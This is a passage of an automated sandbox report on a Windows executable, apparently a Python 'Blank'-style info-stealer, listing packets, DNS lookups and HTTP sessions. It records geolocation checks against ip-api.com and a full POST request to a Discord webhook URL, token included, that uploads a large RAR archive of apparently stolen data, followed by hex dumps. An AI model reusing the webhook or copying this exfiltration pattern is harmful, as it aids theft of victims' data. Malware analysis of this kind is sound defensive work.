                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.406666040 CET4990480192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.406873941 CET4990480192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.411628008 CET8049904208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.866300106 CET8049904208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.867151022 CET4990480192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.872113943 CET8049904208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.872309923 CET4990480192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.409231901 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.414082050 CET8050006208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.416135073 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.416261911 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.421030998 CET8050006208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.889084101 CET8050006208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.938013077 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.204547882 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.204576015 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.204643965 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.230957985 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.230983973 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.689678907 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.691194057 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.691231012 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.692553997 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.692612886 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.695322990 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.695405006 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.695698977 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.695713043 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.695982933 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696024895 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696070910 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696077108 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696218014 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696249962 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696391106 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696405888 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696608067 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696624041 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.696909904 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697160006 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697427988 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697650909 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697756052 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697827101 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.697839975 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698076963 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698091984 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698379993 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698393106 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698592901 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698606014 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698821068 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.698832989 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699057102 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699069023 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699296951 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699316978 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699517012 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699527979 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699776888 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.699796915 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700007915 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700021982 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700261116 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700272083 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700757980 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700768948 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700786114 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700795889 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700932026 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.700943947 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701153040 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701165915 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701406002 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701417923 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701658964 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701673031 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.701891899 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702115059 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702367067 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702591896 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.702847004 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706135035 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706475973 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706502914 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706892967 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.706914902 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707137108 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707149982 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707541943 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707554102 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.707873106 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708081961 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708343983 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708734035 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.708956957 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.710988998 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711337090 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711361885 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711627007 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.711651087 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713449001 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713474035 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713792086 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.713807106 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.714076996 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.714791059 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715158939 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715532064 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.715655088 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.716702938 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356528044 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356610060 CET44350007162.159.137.232192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.356712103 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.357451916 CET50007443192.168.2.4162.159.137.232
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.376818895 CET5000680192.168.2.4208.95.112.1
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.381851912 CET8050006208.95.112.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:20:00.381910086 CET5000680192.168.2.4208.95.112.1

                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Jan 5, 2025 07:19:22.469485044 CET5001853192.168.2.41.1.1.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:22.478086948 CET53500181.1.1.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.390865088 CET4922753192.168.2.41.1.1.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.397901058 CET53492271.1.1.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.401062012 CET6173053192.168.2.41.1.1.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.408387899 CET53617301.1.1.1192.168.2.4
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.196995974 CET6411653192.168.2.41.1.1.1
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET53641161.1.1.1192.168.2.4

                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Jan 5, 2025 07:19:22.469485044 CET192.168.2.41.1.1.10xae70Standard query (0)blank-whj1o.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.390865088 CET192.168.2.41.1.1.10x71d2Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.401062012 CET192.168.2.41.1.1.10x2fbfStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.196995974 CET192.168.2.41.1.1.10x1192Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Jan 5, 2025 07:18:16.266263008 CET1.1.1.1192.168.2.40xe12cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:18:16.266263008 CET1.1.1.1192.168.2.40xe12cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:22.478086948 CET1.1.1.1192.168.2.40xae70Name error (3)blank-whj1o.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.397901058 CET1.1.1.1192.168.2.40x71d2No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.408387899 CET1.1.1.1192.168.2.40x2fbfNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET1.1.1.1192.168.2.40x1192No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET1.1.1.1192.168.2.40x1192No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET1.1.1.1192.168.2.40x1192No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET1.1.1.1192.168.2.40x1192No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Jan 5, 2025 07:19:59.203511953 CET1.1.1.1192.168.2.40x1192No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • discord.com
                                                                                                                                                                                                                              • ip-api.com

                                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.449904208.95.112.1807732C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.406873941 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                              Jan 5, 2025 07:19:25.866300106 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 05 Jan 2025 06:19:25 GMT
                                                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Ttl: 49
                                                                                                                                                                                                                              X-Rl: 43
                                                                                                                                                                                                                              Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                              Data Ascii: false


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.450006208.95.112.1807732C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.416261911 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                              Host: ip-api.com
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                              Jan 5, 2025 07:19:58.889084101 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 05 Jan 2025 06:19:58 GMT
                                                                                                                                                                                                                              Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                              Content-Length: 204
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              X-Ttl: 16
                                                                                                                                                                                                                              X-Rl: 41
                                                                                                                                                                                                                              Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                              Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.450007162.159.137.2324437732C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC302OUTPOST /api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPDaio_xou6MvVt3E_xErz6c HTTP/1.1
                                                                                                                                                                                                                              Host: discord.com
                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                              Content-Length: 757556
                                                                                                                                                                                                                              User-Agent: python-urllib3/2.3.0
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=be021ac6dd6a6f9463cea33afec2e4d4
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 2d 2d 62 65 30 32 31 61 63 36 64 64 36 61 36 66 39 34 36 33 63 65 61 33 33 61 66 65 63 32 65 34 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 b7 77 77 f4 21 04 00 00 01 0f 9c 4a dd f3 43 32 35 39 a9 c3 a5 b7 7b cd 87 5c c2 99 19 9e 87 8a b1 a7 43 b7 d7 c3 82 e2 58 4b ca bc d7 02 18 5d 44 06 5f 07 65 c5 5d 26 2f e5 06 3d 3f 9a ba 51 fa 34 7f 95 83 8b 7c 79 6d 14 07 38 27 38 de 7f 7b 34 b7 b9 8b 5c 9c 0f 13 1b 3d 23 c7 ca 5b d5
                                                                                                                                                                                                                              Data Ascii: --be021ac6dd6a6f9463cea33afec2e4d4Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!ww!JC259{\CXK]D_e]&/=?Q4|ym8'8{4\=#[
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 4c f2 60 34 f8 da 58 52 2a f1 38 0f 2e f1 e5 5b eb 07 2e fd 55 d0 ad 08 5a 28 9b 9b 97 02 09 01 12 69 79 22 63 0c 75 dd 75 d8 9e 8d 0b fb 58 22 36 3f 7e d3 06 ae 1f 40 d0 51 fd 9c 3f d8 37 a2 94 28 83 fe 2a 8e 78 64 80 6c 3a 1c 38 7f 5e 8c 21 2d 44 1a eb 0e bf 1a 60 98 0e 7e 8f 86 a2 45 41 5b b1 93 6a 90 1c 91 94 b6 a7 24 2f ba f2 4c c6 a7 8f 38 a7 72 32 77 11 a2 dc 4e bc 5b 9b dc f1 c1 63 9d 3d 59 d2 79 b6 d2 91 6b e9 2f 1c d2 7b cf 5a 9c 54 7f 89 64 de 61 04 ff 6c 78 da 80 d8 64 10 a1 57 5a 6c f1 c2 de d9 55 3a fe bf 50 d0 fc 1e 1c b5 fd 83 43 cc 81 16 ff 9b 77 b3 3c 74 39 b2 3a 27 6c 36 ac c8 38 04 10 47 7c cd 6b d9 64 65 ab ca bd e3 be c1 6c e5 23 91 a3 5e 78 fe bb c8 5f c4 9c db 87 57 00 dc 4e 4d 29 c2 4d a0 95 c1 88 7c 94 e8 8a b4 98 74 f6 2a 99 d5
                                                                                                                                                                                                                              Data Ascii: L`4XR*8.[.UZ(iy"cuuX"6?~@Q?7(*xdl:8^!-D`~EA[j$/L8r2wN[c=Yyk/{ZTdalxdWZlU:PCw<t9:'l68G|kdel#^x_WNM)M|t*
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: b6 f3 d9 65 80 f9 c2 cf a4 4c 1d a1 a7 58 5a 62 ce d6 e8 dc b1 7c b4 36 f2 f1 38 97 c8 80 4d 80 3b bb aa 20 29 25 c8 80 71 b9 33 32 be d3 9c 24 7b 22 0c 90 58 fb e7 c9 da 1c 51 54 c4 49 dc ae ad 88 6d 56 ae d7 92 c9 20 10 7e 60 b0 6f b3 06 e2 70 8b 13 55 e9 b9 64 26 95 a5 a2 28 3e c6 1e c5 31 a6 4e be b8 dc b7 7b 38 d4 2f 81 f7 57 02 6c 7f f4 71 06 51 d0 4f 78 45 1a 7e c3 a9 93 33 bf 19 05 61 cc 6d 15 af 3d 39 a3 3a c2 e7 43 32 3f 95 ce 43 24 82 56 e3 ab 90 ba 44 28 58 68 82 19 73 77 b4 5b cf 1a 3f 16 3d 72 79 f5 c5 71 e9 96 68 72 cc 34 03 53 29 05 bf ff 64 4d b2 47 fe 65 31 4f b5 74 29 74 14 e2 90 2c 47 1d 71 46 9a 4f d7 15 d5 f1 8a 97 60 dd 2a 85 9e 01 11 73 66 13 e5 c8 f0 a0 30 f3 d3 4d 29 1d 46 c0 f3 18 7f ef ad e4 b9 49 3f 65 d5 2c 6b b3 01 1b 28 21
                                                                                                                                                                                                                              Data Ascii: eLXZb|68M; )%q32${"XQTImV ~`opUd&(>1N{8/WlqQOxE~3am=9:C2?C$VD(Xhsw[?=ryqhr4S)dMGe1Ot)t,GqFO`*sf0M)FI?e,k(!
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 49 a8 5f f0 05 0e d8 b8 ce 46 e1 7a d9 f6 57 35 f5 be 2b fc 91 50 7e c8 b2 b1 c1 c8 51 63 1b 0a a4 90 12 4d 3d e1 81 d5 d9 11 db 06 dc b4 2d f3 4b 65 44 11 db 77 a8 bf 4a a5 e2 87 fe 0c 39 a3 b4 5c 76 0c 4d ae 98 40 00 7f 9d c4 2e 5d 4e 5f ac c7 86 05 32 0b d1 07 64 40 6a a2 c5 d8 2a ad 93 42 47 b6 5a d3 47 68 20 ce 39 24 b9 09 ed e9 57 f1 55 69 e8 20 59 a3 93 3d 84 fb 35 7a 18 a0 43 2d 8a 16 a0 0f 30 e2 58 2d f9 d1 d2 2a f9 d4 f6 4d 3b cf bd 50 dc 69 66 1c fd e4 17 c9 2d 3f 8e 3e c0 bf f7 bd 47 b8 3b 26 5f f1 1f 0d af 2f fa 4f 12 89 62 ca 16 63 09 db d4 52 ef fa d2 db 63 3b 81 79 f2 c5 ac 77 78 ac 02 2e f5 51 7b 3a 2e 18 40 b8 b6 1f 48 27 e1 d2 09 ef 06 a2 84 66 27 35 81 1a 6b a5 d4 e9 42 28 80 a7 e8 34 2c 42 4c 89 ed ad 70 c8 0b b8 96 e2 18 c7 c3 26 6d
                                                                                                                                                                                                                              Data Ascii: I_FzW5+P~QcM=-KeDwJ9\vM@.]N_2d@j*BGZGh 9$WUi Y=5zC-0X-*M;Pif-?>G;&_/ObcRc;ywx.Q{:.@H'f'5kB(4,BLp&m
                                                                                                                                                                                                                              2025-01-05 06:19:59 UTC16384OUTData Raw: 2f c9 6e 02 a8 01 8a 6b 2c 11 8d 7f fd c5 ba d5 ca 4b 4e f5 61 dc 7b 9f 57 fe 5f 2a 34 e9 06 f5 a3 6e f5 18 47 d9 c0 1e 97 24 f5 6d a5 20 81 05 85 af 8d 58 da c9 6f 5b 62 9b 4d 7f 2a ef 58 ca 96 9f 4c 32 71 83 e8 60 fa 42 6f 3d 98 d6 39 d5 e0 8f e7 c7 f8 a6 3d fb 50 40 16 85 4c e4 47 85 51 63 67 20 87 88 65 4a 1c d9 01 fb a1 5f 98 5d 71 91 8f 4b ed ef ab a8 5f 22 f0 8e ee 09 f4 76 87 93 c4 d4 1c 2f 4c 44 38 ec 3f 92 1b e9 6a c5 b3 ca 8d 13 7f c1 8f 16 67 49 fe a3 76 11 c2 21 9b 1f dc 5f 5c 92 df df ce d1 17 a6 79 99 cf 9a 73 43 40 6b 99 17 1f 0c dc 45 26 74 3b 7e 3f 88 fb 64 28 cc ff 71 d1 56 8a c0 22 35 99 5b 77 fd 48 44 a1 4d 2b ec 37 d2 6a 45 59 a1 12 03 9e a7 99 3b c2 62 a1 38 54 f5 54 1f 96 84 7f f2 96 34 74 11 79 3d ee 98 2f bc bc 36 19 b9 bd d9 cc
                                                                                                                                                                                                                              Data Ascii: /nk,KNa{W_*4nG$m Xo[bM*XL2q`Bo=9=P@LGQcg eJ_]qK_"v/LD8?jgIv!_\ysC@kE&t;~?d(qV"5[wHDM+7jEY;b8TT4ty=/6
